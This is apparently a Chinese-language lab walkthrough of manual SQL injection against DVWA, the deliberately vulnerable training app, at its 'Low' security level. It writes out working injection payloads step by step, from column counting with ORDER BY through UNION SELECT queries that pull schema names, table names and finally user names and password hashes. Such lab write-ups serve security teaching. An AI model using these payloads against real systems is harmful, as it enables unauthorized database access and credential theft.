DVWA安全级别为“Low”
判断存在sql注入漏洞
输入1 and 1=2
,显示仍然正常
故,判断不存在数字型漏洞
输入1’ and ‘1’=’1
,正常显示
输入1’ and ‘1’=’2
,没有显示结果
故判断,此处存在一个sql注入漏洞,并且是字符型的漏洞
使用order by函数,以及二分法判断列数
输入1' order by 10 #
,显示错误,故不存在10列
1' order by 2#
显示出了结果,故判断该数据表存在两列数据
通过order by函数判断该数据表存在两列数据
使用1' union select 1,2 #
,查看两列数据是否都正常显示
结果判断,两列数据都能够正常显示
1' union select version(),2 #
1' union select session_user(),2 #
显示当前数据库连接的用户为root@localhost
1' union select database(),2 #
显示当前数据库名称为dvwa
1' union select @@basedir,2 #
数据库安装路径为/usr
1' union select @@version_compile_os,2 #
操作系统为Linux
1' union select schema_name,2 from information_schema.schemata#
爆出当前存在四个数据库,分别为information_schema、dvwa、mysql、performance_schema
1' union select table_name,2 from information_schema.tables where table_schema='dvwa'#
爆出dvwa数据库中有两个表,分别为guestbook表和users表
1' union select column_name,2 from information_schema.columns where table_name='users'#
爆出users表中的字段值有user_id,first_name,last_name,user,password,avatar,last_login,failed_login这几个字段
1' union select user,password from dvwa.users#
成功爆出users表中所有用户的账号和密码